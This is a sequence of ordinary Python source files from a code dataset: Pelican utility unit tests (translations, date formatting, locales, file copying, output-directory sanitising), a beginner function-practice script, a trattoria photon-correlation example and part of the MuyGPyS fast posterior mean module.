en_articles.append(\n get_article(lang=\"en\", slug=\"yay0\", title=\"Title\", content=\"in english\")\n )\n # 1: translation metadata on default lang\n fr_articles.append(\n get_article(lang=\"fr\", slug=\"yay1\", title=\"Titre\", content=\"en français\")\n )\n en_articles.append(\n get_article(\n lang=\"en\",\n slug=\"yay1\",\n title=\"Title\",\n content=\"in english\",\n translation=\"true\",\n )\n )\n # 2: translation metadata not on default lang\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay2\",\n title=\"Titre\",\n content=\"en français\",\n translation=\"true\",\n )\n )\n en_articles.append(\n get_article(lang=\"en\", slug=\"yay2\", title=\"Title\", content=\"in english\")\n )\n # 3: back to default language detection if all items have the\n # translation metadata\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay3\",\n title=\"Titre\",\n content=\"en français\",\n translation=\"yep\",\n )\n )\n en_articles.append(\n get_article(\n lang=\"en\",\n slug=\"yay3\",\n title=\"Title\",\n content=\"in english\",\n translation=\"yes\",\n )\n )\n # 4-5: translation pairs with the same slug but different category\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay4\",\n title=\"Titre\",\n content=\"en français\",\n category=\"foo\",\n )\n )\n en_articles.append(\n get_article(\n lang=\"en\",\n slug=\"yay4\",\n title=\"Title\",\n content=\"in english\",\n category=\"foo\",\n )\n )\n fr_articles.append(\n get_article(\n lang=\"fr\",\n slug=\"yay4\",\n title=\"Titre\",\n content=\"en français\",\n category=\"bar\",\n 
)\n )\n en_articles.append(\n get_article(\n lang=\"en\",\n slug=\"yay4\",\n title=\"Title\",\n content=\"in english\",\n category=\"bar\",\n )\n )\n\n # try adding articles in both orders\n for lang0_articles, lang1_articles in (\n (fr_articles, en_articles),\n (en_articles, fr_articles),\n ):\n articles = lang0_articles + lang1_articles\n\n # test process_translations with falsy translation_id\n index, trans = utils.process_translations(articles, translation_id=None)\n for i in range(6):\n for lang_articles in [en_articles, fr_articles]:\n self.assertIn(lang_articles[i], index)\n self.assertNotIn(lang_articles[i], trans)\n\n # test process_translations with simple and complex translation_id\n for translation_id in [\"slug\", {\"slug\", \"category\"}]:\n index, trans = utils.process_translations(\n articles, translation_id=translation_id\n )\n\n for a in [\n en_articles[0],\n fr_articles[1],\n en_articles[2],\n en_articles[3],\n en_articles[4],\n en_articles[5],\n ]:\n self.assertIn(a, index)\n self.assertNotIn(a, trans)\n\n for a in [\n fr_articles[0],\n en_articles[1],\n fr_articles[2],\n fr_articles[3],\n fr_articles[4],\n fr_articles[5],\n ]:\n self.assertIn(a, trans)\n self.assertNotIn(a, index)\n\n for i in range(6):\n self.assertIn(en_articles[i], fr_articles[i].translations)\n self.assertIn(fr_articles[i], en_articles[i].translations)\n\n for a_arts in [en_articles, fr_articles]:\n for b_arts in [en_articles, fr_articles]:\n if translation_id == \"slug\":\n self.assertIn(a_arts[4], b_arts[5].translations)\n self.assertIn(a_arts[5], b_arts[4].translations)\n elif translation_id == {\"slug\", \"category\"}:\n self.assertNotIn(a_arts[4], b_arts[5].translations)\n self.assertNotIn(a_arts[5], b_arts[4].translations)\n\n def test_clean_output_dir(self):\n retention = ()\n test_directory = os.path.join(self.temp_output, \"clean_output\")\n content = os.path.join(os.path.dirname(__file__), \"content\")\n shutil.copytree(content, test_directory)\n utils.clean_output_dir(test_directory, retention)\n self.assertTrue(os.path.isdir(test_directory))\n self.assertListEqual([], os.listdir(test_directory))\n shutil.rmtree(test_directory)\n\n def test_clean_output_dir_not_there(self):\n retention = ()\n test_directory = os.path.join(self.temp_output, \"does_not_exist\")\n utils.clean_output_dir(test_directory, retention)\n self.assertFalse(os.path.exists(test_directory))\n\n def test_clean_output_dir_is_file(self):\n retention = ()\n test_directory = os.path.join(self.temp_output, \"this_is_a_file\")\n f = open(test_directory, \"w\")\n f.write(\"\")\n f.close()\n utils.clean_output_dir(test_directory, retention)\n self.assertFalse(os.path.exists(test_directory))\n\n def test_strftime(self):\n d = utils.SafeDatetime(2012, 8, 29)\n\n # simple formatting\n self.assertEqual(utils.strftime(d, \"%d/%m/%y\"), \"29/08/12\")\n self.assertEqual(utils.strftime(d, \"%d/%m/%Y\"), \"29/08/2012\")\n\n # RFC 3339\n self.assertEqual(\n utils.strftime(d, \"%Y-%m-%dT%H:%M:%SZ\"), \"2012-08-29T00:00:00Z\"\n )\n\n # % escaped\n self.assertEqual(utils.strftime(d, \"%d%%%m%%%y\"), \"29%08%12\")\n self.assertEqual(utils.strftime(d, \"%d %% %m %% %y\"), \"29 % 08 % 12\")\n # not valid % formatter\n self.assertEqual(\n utils.strftime(d, \"10% reduction in %Y\"), \"10% reduction in 2012\"\n )\n self.assertEqual(\n utils.strftime(d, \"%10 reduction in %Y\"), \"%10 reduction in 2012\"\n )\n\n # with text\n self.assertEqual(\n utils.strftime(d, \"Published in %d-%m-%Y\"), \"Published in 29-08-2012\"\n )\n\n # with non-ascii 
text\n self.assertEqual(\n utils.strftime(d, \"%d/%m/%Y Øl trinken beim Besäufnis\"),\n \"29/08/2012 Øl trinken beim Besäufnis\",\n )\n\n # alternative formatting options\n self.assertEqual(utils.strftime(d, \"%-d/%-m/%y\"), \"29/8/12\")\n self.assertEqual(utils.strftime(d, \"%-H:%-M:%-S\"), \"0:0:0\")\n\n d = utils.SafeDatetime(2012, 8, 9)\n self.assertEqual(utils.strftime(d, \"%-d/%-m/%y\"), \"9/8/12\")\n\n d = utils.SafeDatetime(2021, 1, 8)\n self.assertEqual(utils.strftime(d, \"%G - %-V - %u\"), \"2021 - 1 - 5\")\n\n # test the output of utils.strftime in a different locale\n # Turkish locale\n @unittest.skipUnless(\n locale_available(\"tr_TR.UTF-8\") or locale_available(\"Turkish\"),\n \"Turkish locale needed\",\n )\n def test_strftime_locale_dependent_turkish(self):\n temp_locale = \"Turkish\" if platform == \"win32\" else \"tr_TR.UTF-8\"\n\n with utils.temporary_locale(temp_locale):\n d = utils.SafeDatetime(2012, 8, 29)\n\n # simple\n self.assertEqual(utils.strftime(d, \"%d %B %Y\"), \"29 Ağustos 2012\")\n self.assertEqual(\n utils.strftime(d, \"%A, %d %B %Y\"), \"Çarşamba, 29 Ağustos 2012\"\n )\n\n # with text\n self.assertEqual(\n utils.strftime(d, \"Yayınlanma tarihi: %A, %d %B %Y\"),\n \"Yayınlanma tarihi: Çarşamba, 29 Ağustos 2012\",\n )\n\n # non-ascii format candidate (someone might pass it… for some reason)\n self.assertEqual(\n utils.strftime(d, \"%Y yılında %üretim artışı\"),\n \"2012 yılında %üretim artışı\",\n )\n\n # test the output of utils.strftime in a different locale\n # French locale\n @unittest.skipUnless(\n locale_available(\"fr_FR.UTF-8\") or locale_available(\"French\"),\n \"French locale needed\",\n )\n def test_strftime_locale_dependent_french(self):\n temp_locale = \"French\" if platform == \"win32\" else \"fr_FR.UTF-8\"\n\n with utils.temporary_locale(temp_locale):\n d = utils.SafeDatetime(2012, 8, 29)\n\n # simple\n self.assertEqual(utils.strftime(d, \"%d %B %Y\"), \"29 août 2012\")\n\n # depending on OS, the first letter is m or M\n self.assertTrue(utils.strftime(d, \"%A\") in (\"mercredi\", \"Mercredi\"))\n\n # with text\n self.assertEqual(\n utils.strftime(d, \"Écrit le %d %B %Y\"), \"Écrit le 29 août 2012\"\n )\n\n # non-ascii format candidate (someone might pass it… for some reason)\n self.assertEqual(utils.strftime(d, \"%écrits en %Y\"), \"%écrits en 2012\")\n\n def test_maybe_pluralize(self):\n self.assertEqual(utils.maybe_pluralize(0, \"Article\", \"Articles\"), \"0 Articles\")\n self.assertEqual(utils.maybe_pluralize(1, \"Article\", \"Articles\"), \"1 Article\")\n self.assertEqual(utils.maybe_pluralize(2, \"Article\", \"Articles\"), \"2 Articles\")\n\n def test_temporary_locale(self):\n # test with default LC category\n orig_locale = locale.setlocale(locale.LC_ALL)\n\n with utils.temporary_locale(\"C\"):\n self.assertEqual(locale.setlocale(locale.LC_ALL), \"C\")\n\n self.assertEqual(locale.setlocale(locale.LC_ALL), orig_locale)\n\n # test with custom LC category\n orig_locale = locale.setlocale(locale.LC_TIME)\n\n with utils.temporary_locale(\"C\", locale.LC_TIME):\n self.assertEqual(locale.setlocale(locale.LC_TIME), \"C\")\n\n self.assertEqual(locale.setlocale(locale.LC_TIME), orig_locale)\n\n\nclass TestCopy(unittest.TestCase):\n \"\"\"Tests the copy utility\"\"\"\n\n def setUp(self):\n self.root_dir = mkdtemp(prefix=\"pelicantests.\")\n self.old_locale = locale.setlocale(locale.LC_ALL)\n locale.setlocale(locale.LC_ALL, \"C\")\n\n def tearDown(self):\n shutil.rmtree(self.root_dir)\n locale.setlocale(locale.LC_ALL, self.old_locale)\n\n def 
_create_file(self, *path):\n with open(os.path.join(self.root_dir, *path), \"w\") as f:\n f.write(\"42\\n\")\n\n def _create_dir(self, *path):\n os.makedirs(os.path.join(self.root_dir, *path))\n\n def _exist_file(self, *path):\n path = os.path.join(self.root_dir, *path)\n self.assertTrue(os.path.isfile(path), \"File does not exist: %s\" % path)\n\n def _exist_dir(self, *path):\n path = os.path.join(self.root_dir, *path)\n self.assertTrue(os.path.exists(path), \"Directory does not exist: %s\" % path)\n\n def test_copy_file_same_path(self):\n self._create_file(\"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a.txt\"), os.path.join(self.root_dir, \"b.txt\")\n )\n self._exist_file(\"b.txt\")\n\n def test_copy_file_different_path(self):\n self._create_dir(\"a\")\n self._create_dir(\"b\")\n self._create_file(\"a\", \"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a\", \"a.txt\"),\n os.path.join(self.root_dir, \"b\", \"b.txt\"),\n )\n self._exist_dir(\"b\")\n self._exist_file(\"b\", \"b.txt\")\n\n def test_copy_file_create_dirs(self):\n self._create_file(\"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a.txt\"),\n os.path.join(self.root_dir, \"b0\", \"b1\", \"b2\", \"b3\", \"b.txt\"),\n )\n self._exist_dir(\"b0\")\n self._exist_dir(\"b0\", \"b1\")\n self._exist_dir(\"b0\", \"b1\", \"b2\")\n self._exist_dir(\"b0\", \"b1\", \"b2\", \"b3\")\n self._exist_file(\"b0\", \"b1\", \"b2\", \"b3\", \"b.txt\")\n\n def test_copy_dir_same_path(self):\n self._create_dir(\"a\")\n self._create_file(\"a\", \"a.txt\")\n utils.copy(os.path.join(self.root_dir, \"a\"), os.path.join(self.root_dir, \"b\"))\n self._exist_dir(\"b\")\n self._exist_file(\"b\", \"a.txt\")\n\n def test_copy_dir_different_path(self):\n self._create_dir(\"a0\")\n self._create_dir(\"a0\", \"a1\")\n self._create_file(\"a0\", \"a1\", \"a.txt\")\n self._create_dir(\"b0\")\n utils.copy(\n os.path.join(self.root_dir, \"a0\", \"a1\"),\n os.path.join(self.root_dir, \"b0\", \"b1\"),\n )\n self._exist_dir(\"b0\", \"b1\")\n self._exist_file(\"b0\", \"b1\", \"a.txt\")\n\n def test_copy_dir_create_dirs(self):\n self._create_dir(\"a\")\n self._create_file(\"a\", \"a.txt\")\n utils.copy(\n os.path.join(self.root_dir, \"a\"),\n os.path.join(self.root_dir, \"b0\", \"b1\", \"b2\", \"b3\", \"b\"),\n )\n self._exist_dir(\"b0\")\n self._exist_dir(\"b0\", \"b1\")\n self._exist_dir(\"b0\", \"b1\", \"b2\")\n self._exist_dir(\"b0\", \"b1\", \"b2\", \"b3\")\n self._exist_dir(\"b0\", \"b1\", \"b2\", \"b3\", \"b\")\n self._exist_file(\"b0\", \"b1\", \"b2\", \"b3\", \"b\", \"a.txt\")\n\n\nclass TestDateFormatter(unittest.TestCase):\n \"\"\"Tests that the output of DateFormatter jinja filter is same as\n utils.strftime\"\"\"\n\n def setUp(self):\n # prepare a temp content and output folder\n self.temp_content = mkdtemp(prefix=\"pelicantests.\")\n self.temp_output = mkdtemp(prefix=\"pelicantests.\")\n\n # prepare a template file\n template_dir = os.path.join(self.temp_content, \"template\")\n template_path = os.path.join(template_dir, \"source.html\")\n os.makedirs(template_dir)\n with open(template_path, \"w\") as template_file:\n template_file.write('date = {{ date|strftime(\"%A, %d %B %Y\") }}')\n self.date = utils.SafeDatetime(2012, 8, 29)\n\n def tearDown(self):\n shutil.rmtree(self.temp_content)\n shutil.rmtree(self.temp_output)\n # reset locale to default\n locale.setlocale(locale.LC_ALL, \"\")\n\n @unittest.skipUnless(\n locale_available(\"fr_FR.UTF-8\") or locale_available(\"French\"),\n \"French locale needed\",\n )\n def 
test_french_strftime(self):\n # This test tries to reproduce an issue that\n # occurred with python3.3 under macos10 only\n temp_locale = \"French\" if platform == \"win32\" else \"fr_FR.UTF-8\"\n\n with utils.temporary_locale(temp_locale):\n date = utils.SafeDatetime(2014, 8, 14)\n # we compare the lower() dates since macos10 returns\n # \"Jeudi\" for %A whereas linux reports \"jeudi\"\n self.assertEqual(\n \"jeudi, 14 août 2014\",\n utils.strftime(date, date_format=\"%A, %d %B %Y\").lower(),\n )\n df = utils.DateFormatter()\n self.assertEqual(\n \"jeudi, 14 août 2014\", df(date, date_format=\"%A, %d %B %Y\").lower()\n )\n\n # Let us now set the global locale to C:\n with utils.temporary_locale(\"C\"):\n # DateFormatter should still work as expected\n # since it is the whole point of DateFormatter\n # (This is where pre-2014/4/15 code fails on macos10)\n df_date = df(date, date_format=\"%A, %d %B %Y\").lower()\n self.assertEqual(\"jeudi, 14 août 2014\", df_date)\n\n @unittest.skipUnless(\n locale_available(\"fr_FR.UTF-8\") or locale_available(\"French\"),\n \"French locale needed\",\n )\n def test_french_locale(self):\n if platform == \"win32\":\n locale_string = \"French\"\n else:\n locale_string = \"fr_FR.UTF-8\"\n settings = read_settings(\n override={\n \"LOCALE\": locale_string,\n \"TEMPLATE_PAGES\": {\"template/source.html\": \"generated/file.html\"},\n }\n )\n\n generator = TemplatePagesGenerator(\n {\"date\": self.date}, settings, self.temp_content, \"\", self.temp_output\n )\n generator.env.filters.update({\"strftime\": utils.DateFormatter()})\n\n writer = Writer(self.temp_output, settings=settings)\n generator.generate_output(writer)\n\n output_path = os.path.join(self.temp_output, \"generated\", \"file.html\")\n\n # output file has been generated\n self.assertTrue(os.path.exists(output_path))\n\n # output content is correct\n with utils.pelican_open(output_path) as output_file:\n self.assertEqual(\n output_file, utils.strftime(self.date, \"date = %A, %d %B %Y\")\n )\n\n @unittest.skipUnless(\n locale_available(\"tr_TR.UTF-8\") or locale_available(\"Turkish\"),\n \"Turkish locale needed\",\n )\n def test_turkish_locale(self):\n if platform == \"win32\":\n locale_string = \"Turkish\"\n else:\n locale_string = \"tr_TR.UTF-8\"\n settings = read_settings(\n override={\n \"LOCALE\": locale_string,\n \"TEMPLATE_PAGES\": {\"template/source.html\": \"generated/file.html\"},\n }\n )\n\n generator = TemplatePagesGenerator(\n {\"date\": self.date}, settings, self.temp_content, \"\", self.temp_output\n )\n generator.env.filters.update({\"strftime\": utils.DateFormatter()})\n\n writer = Writer(self.temp_output, settings=settings)\n generator.generate_output(writer)\n\n output_path = os.path.join(self.temp_output, \"generated\", \"file.html\")\n\n # output file has been generated\n self.assertTrue(os.path.exists(output_path))\n\n # output content is correct\n with utils.pelican_open(output_path) as output_file:\n self.assertEqual(\n output_file, utils.strftime(self.date, \"date = %A, %d %B %Y\")\n )\n\n\nclass TestSanitisedJoin(unittest.TestCase):\n def test_detect_parent_breakout(self):\n with self.assertRaisesRegex(\n RuntimeError,\n \"Attempted to break out of output directory to \" \"(.*?:)?/foo/test\",\n ): # (.*?:)? accounts for Windows root\n utils.sanitised_join(\"/foo/bar\", \"../test\")\n\n def test_detect_root_breakout(self):\n with self.assertRaisesRegex(\n RuntimeError,\n \"Attempted to break out of output directory to \" \"(.*?:)?/test\",\n ): # (.*?:)? 
accounts for Windows root\n utils.sanitised_join(\"/foo/bar\", \"/test\")\n\n def test_pass_deep_subpaths(self):\n self.assertEqual(\n utils.sanitised_join(\"/foo/bar\", \"test\"),\n utils.posixize_path(os.path.abspath(os.path.join(\"/foo/bar\", \"test\"))),\n )\n\n\nclass TestMemoized(unittest.TestCase):\n def test_memoized(self):\n class Container:\n def _get(self, key):\n pass\n\n @utils.memoized\n def get(self, key):\n return self._get(key)\n\n container = Container()\n\n with unittest.mock.patch.object(\n container, \"_get\", side_effect=lambda x: x\n ) as get_mock:\n self.assertEqual(\"foo\", container.get(\"foo\"))\n get_mock.assert_called_once_with(\"foo\")\n\n get_mock.reset_mock()\n self.assertEqual(\"foo\", container.get(\"foo\"))\n get_mock.assert_not_called()\n\n self.assertEqual(\"bar\", container.get(\"bar\"))\n get_mock.assert_called_once_with(\"bar\")\n\n get_mock.reset_mock()\n container.get.cache.clear()\n self.assertEqual(\"bar\", container.get(\"bar\"))\n get_mock.assert_called_once_with(\"bar\")\n","repo_name":"getpelican/pelican","sub_path":"pelican/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":34429,"program_lang":"python","lang":"en","doc_type":"code","stars":11876,"dataset":"github-code","pt":"37"}
{"seq_id":"6020551756","text":"# 1] write a function to find the maximum of 3 numbers\ndef max_num(a,b,c):\n return max([a,b,c])\n\nprint(max_num(2,50,95))\nprint(max_num(900,510,60))\nprint(max_num(23,-5930,989))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 2] write a function to multiply all the numbers in a list\ndef mult_list(lst):\n if len(lst) ==0:\n return 0\n prod = lst[0]\n if len(lst) > 1:\n for i in lst[1:]:\n prod = prod * i\n return prod\n\nprint(mult_list([1,2,3]))\nprint(mult_list([]))\nprint(mult_list([15]))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 3] write a function to reverse a string\ndef rev_string(my_string):\n return my_string[::-1]\n\nprint(rev_string(' '))\nprint(rev_string('apple'))\nprint(rev_string('hello my name is bb'))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 4] write a function to check whether a number falls in a given range\ndef num_within_range(x,a,b):\n return x in range(a,b+1)\n\nprint(num_within_range(3,2,4))\nprint(num_within_range(8,12,24))\nprint(num_within_range(10,2,50))\n\n\nprint('XXXXXXXXXXXXXXXXXX')\n# 5] write a function that prints out the first n rows of Pascal's triangle\ntriangle = [[1], [1,1]]\ndef pascal(n):\n if n < 1:\n print('invalid number of rows')\n elif n == 1:\n print(triangle[0])\n else:\n row_number = 2\n while len(triangle) < n:\n row = []\n row_prev = triangle[row_number - 1]\n length = len(row_prev) + 1\n for i in range(length):\n if i == 0:\n row.append(1)\n elif i > 0 and i < length-1:\n row.append(triangle[row_number - 1][i - 1]+triangle[row_number - 1][i])\n else:\n row.append(1)\n triangle.append(row)\n row_number += 1\n for row in triangle:\n print(row)\n\npascal(2)\npascal(5)","repo_name":"bamay002/Python-Function-Practice-Part-4","sub_path":"practice4.py","file_name":"practice4.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73928328427","text":"import os\nfrom pathlib import Path\nfrom time import perf_counter\n\nimport matplotlib.pyplot as plt\n\nimport trattoria\n\n# ptu_filepath = Path(\"/Users/garfield/Downloads/20191205_Xminus_0p1Ve-6_CW_HBT.ptu\")\nptu_filepath = Path(\"/Users/garfield/Downloads/GUI_T3_10s.ptu\")\n# ptu_filepath = 
Path(\"/Users/garfield/Downloads/GUI_T2.ptu\")\nptu = trattoria.PTUFile(ptu_filepath)\nfile_size = os.path.getsize(ptu_filepath) / (1024.0 ** 3)\nprint(ptu)\n\n# Test G2 With manual postselection\nstart_time = perf_counter()\n\n\n# We can manually specify what records to consider.\n# Note the explicit casting to integers. G2Parameters expects a pair of actual\n# integers, hence the int(1e7) and the use of tuples. For example the following\n# is not valid:\n# [[0, int(1e7)]] <- invalid. This a list of lists not a list of tuples\n# [(0, 1e7)] <- invalid. This a list of tuples but one of the values is a float!\nmanual_post_selection_ranges = [\n (0, int(1e7)),\n (int(3e7), int(4e7)),\n]\n\n# you can also derive the postselection intervals based on an intensity threshold\ntimetrace_params = trattoria.TimeTraceParameters(\n resolution=0.1,\n channel=0,\n)\ntt_res = ptu.timetrace(timetrace_params)\n\nauto_post_selection_ranges = trattoria.construct_postselect_vector(\n tt_res, # Result from a timetrace experiment\n 1000, # Counts per time resolution bin in the trace\n True, # True = select above the threshold, False = select below\n)\n\ng2_params = trattoria.G2Parameters(\n channel_1=1,\n channel_2=2,\n correlation_window=10000e-12,\n resolution=60e-12,\n record_ranges=auto_post_selection_ranges,\n)\ng2_res = ptu.g2(g2_params)\nend_time = perf_counter()\ntime_delta = end_time - start_time\nprint(f\"G2 execution time: {time_delta:.3f} s\")\nprint(f\" Processed {file_size/time_delta:.2f} GB/s\")\n\nplt.plot(g2_res.t * 1e9, g2_res.g2)\nplt.xlabel(\"Delay (ns)\")\nplt.show()\n","repo_name":"GCBallesteros/trattoria","sub_path":"examples/postselection.py","file_name":"postselection.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"31052976308","text":"from time import perf_counter\nfrom typing import Dict, List, Tuple, Union\n\nimport MuyGPyS._src.math as mm\nfrom MuyGPyS.gp import MuyGPS, MultivariateMuyGPS as MMuyGPS\nfrom MuyGPyS.examples.from_indices import fast_posterior_mean_from_indices\nfrom MuyGPyS.examples.regress import _decide_and_make_regressor\nfrom MuyGPyS.gp.tensors import fast_nn_update\nfrom MuyGPyS.gp.tensors import pairwise_tensor\nfrom MuyGPyS.neighbors import NN_Wrapper\nfrom MuyGPyS.optimize import Bayes_optimize, OptimizeFn\nfrom MuyGPyS.optimize.loss import LossFn, lool_fn\n\n\ndef make_fast_regressor(\n muygps: MuyGPS,\n nbrs_lookup: NN_Wrapper,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray]:\n \"\"\"\n Convenience function for creating precomputed coefficient matrix and neighbor lookup data\n structure.\n\n Args:\n muygps:\n A (possibly trained) MuyGPS object.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n train_targets:\n A matrix of shape `(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n\n Returns\n -------\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n nn_indices:\n A numpy.ndarrray supporting nearest neighbor queries.\n \"\"\"\n\n num_training_samples, _ = train_features.shape\n nn_indices, _ = nbrs_lookup.get_batch_nns(\n mm.arange(0, num_training_samples)\n )\n 
nn_indices = fast_nn_update(nn_indices)\n\n train_nn_targets = train_targets[nn_indices]\n K = muygps.kernel(pairwise_tensor(train_features, nn_indices))\n\n precomputed_coefficients_matrix = muygps.fast_coefficients(\n K, train_nn_targets\n )\n\n return precomputed_coefficients_matrix, nn_indices\n\n\ndef make_fast_multivariate_regressor(\n mmuygps: MMuyGPS,\n nbrs_lookup: NN_Wrapper,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray]:\n \"\"\"\n Convenience function for creating precomputed coefficient matrix and neighbor lookup data\n structure.\n\n Args:\n muygps:\n A trained MultivariateMuyGPS object.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n train_targets:\n A matrix of shape `(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n\n Returns\n -------\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n nn_indices:\n An array supporting nearest neighbor queries.\n \"\"\"\n num_training_samples, _ = train_features.shape\n nn_indices, _ = nbrs_lookup.get_batch_nns(\n mm.arange(0, num_training_samples)\n )\n\n nn_indices = fast_nn_update(nn_indices)\n pairwise_diffs_fast = pairwise_tensor(train_features, nn_indices)\n train_nn_targets = train_targets[nn_indices]\n precomputed_coefficients_matrix = mmuygps.fast_coefficients(\n pairwise_diffs_fast, train_nn_targets\n )\n return precomputed_coefficients_matrix, nn_indices\n\n\ndef _decide_and_make_fast_regressor(\n muygps: Union[MuyGPS, MMuyGPS],\n nbrs_lookup: NN_Wrapper,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray]:\n if isinstance(muygps, MuyGPS):\n precomputed_coefficients_matrix, nn_indices = make_fast_regressor(\n muygps,\n nbrs_lookup,\n train_features,\n train_targets,\n )\n else:\n (\n precomputed_coefficients_matrix,\n nn_indices,\n ) = make_fast_multivariate_regressor(\n muygps,\n nbrs_lookup,\n train_features,\n train_targets,\n )\n return precomputed_coefficients_matrix, nn_indices\n\n\ndef do_fast_posterior_mean(\n test_features: mm.ndarray,\n train_features: mm.ndarray,\n train_targets: mm.ndarray,\n nn_count: int = 30,\n batch_count: int = 200,\n loss_fn: LossFn = lool_fn,\n opt_fn: OptimizeFn = Bayes_optimize,\n k_kwargs: Union[Dict, Union[List[Dict], Tuple[Dict, ...]]] = dict(),\n nn_kwargs: Dict = dict(),\n opt_kwargs: Dict = dict(),\n verbose: bool = False,\n) -> Tuple[mm.ndarray, NN_Wrapper, mm.ndarray, mm.ndarray, Dict]:\n \"\"\"\n Convenience function initializing a model and performing fast posterior mean\n inference.\n\n Expected parameters include keyword argument dicts specifying kernel\n parameters and nearest neighbor parameters. See the docstrings of the\n appropriate functions for specifics.\n\n Also supports workflows relying upon multivariate models. 
In order to create\n a multivariate model, specify the `kern` argument and pass a list of\n hyperparameter dicts to `k_kwargs`.\n\n Example:\n >>> from MuyGPyS.testing.test_utils import _make_gaussian_data\n >>> from MuyGPyS.examples.fast_posterior_mean import do_fast_posterior_mean\n >>> from MuyGPyS.gp.deformation import F2, Isotropy\n >>> from MuyGPyS.gp.hyperparameter import Parameter\n >>> from MuyGPyS.gp.hyperparameter import AnalyticScale\n >>> from MuyGPyS.gp.kernels import RBF\n >>> from MuyGPyS.gp.noise import HomoscedasticNoise\n >>> from MuyGPyS.optimize import Bayes_optimize\n >>> from MuyGPyS.optimize.objective import mse_fn\n >>> train_features, train_responses = make_train() # stand-in function\n >>> test_features, test_responses = make_test() # stand-in function\n >>> nn_kwargs = {\"nn_method\": \"exact\", \"algorithm\": \"ball_tree\"}\n >>> k_kwargs = {\n ... \"kernel\": RBF(\n ... deformation=Isotropy(\n ... metric=F2,\n ... length_scale=Parameter(1.0, (1e-2, 1e2))\n ... )\n ... ),\n ... \"noise\": HomoscedasticNoise(1e-5),\n ... \"scale\": AnalyticScale(),\n ... }\n >>> (\n ... muygps, nbrs_lookup, predictions, precomputed_coefficients_matrix\n ... ) = do_fast_posterior_mean(\n ... test_features,\n ... train_features,\n ... train_responses,\n ... nn_count=30,\n ... batch_count=200,\n ... loss_fn=lool_fn,\n ... opt_fn=Bayes_optimize,\n ... k_kwargs=k_kwargs,\n ... nn_kwargs=nn_kwargs,\n ... verbose=False,\n ... )\n\n Args:\n test_features:\n A matrix of shape `(test_count, feature_count)` whose rows consist\n of observation vectors of the test data.\n train_features:\n A matrix of shape `(train_count, feature_count)` whose rows consist\n of observation vectors of the train data.\n train_targets:\n A matrix of shape `(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n nn_count:\n The number of nearest neighbors to employ.\n batch_count:\n The number of elements to sample batch for hyperparameter\n optimization.\n loss_fn:\n The loss functor to use in hyperparameter optimization. Ignored if\n all of the parameters specified by argument `k_kwargs` are fixed.\n opt_fn:\n The optimization functor to use in hyperparameter optimization.\n Ignored if all of the parameters specified by argument `k_kwargs`\n are fixed.\n k_kwargs:\n If given a list or tuple of length `response_count`, assume that the\n elements are dicts containing kernel initialization keyword\n arguments for the creation of a multivariate model (see\n :func:`~MuyGPyS.examples.regress.make_multivariate_regressor`).\n If given a dict, assume that the elements are keyword arguments to\n a MuyGPs model (see\n :func:`~MuyGPyS.examples.regress.make_regressor`).\n nn_kwargs:\n Parameters for the nearest neighbors wrapper. See\n :class:`MuyGPyS.neighbors.NN_Wrapper` for the supported methods and\n their parameters.\n opt_kwargs:\n Parameters for the wrapped optimizer. 
See the docs of the\n corresponding library for supported parameters.\n verbose:\n If `True`, print summary statistics.\n\n Returns\n -------\n muygps:\n A (possibly trained) MuyGPs object.\n nbrs_lookup:\n A data structure supporting nearest neighbor queries into\n `train_features`.\n predictions:\n The predicted response associated with each test observation.\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n timing:\n A dictionary containing timings for the training, precomputation,\n nearest neighbor computation, and prediction.\n \"\"\"\n regressor, nbrs_lookup = _decide_and_make_regressor(\n train_features,\n train_targets,\n nn_count=nn_count,\n batch_count=batch_count,\n loss_fn=loss_fn,\n opt_fn=opt_fn,\n k_kwargs=k_kwargs,\n nn_kwargs=nn_kwargs,\n opt_kwargs=opt_kwargs,\n verbose=verbose,\n )\n\n (\n posterior_mean,\n precomputed_coefficients_matrix,\n timing,\n ) = fast_posterior_mean_any(\n regressor,\n test_features,\n train_features,\n nbrs_lookup,\n train_targets,\n )\n return (\n regressor,\n nbrs_lookup,\n posterior_mean,\n precomputed_coefficients_matrix,\n timing,\n )\n\n\ndef fast_posterior_mean_any(\n muygps: Union[MuyGPS, MMuyGPS],\n test_features: mm.ndarray,\n train_features: mm.ndarray,\n nbrs_lookup: NN_Wrapper,\n train_targets: mm.ndarray,\n) -> Tuple[mm.ndarray, mm.ndarray, Dict]:\n \"\"\"\n Convenience function performing fast posterior mean inference using a\n pre-trained model.\n\n Also supports workflows relying upon multivariate models.\n\n Args:\n muygps:\n A (possibly 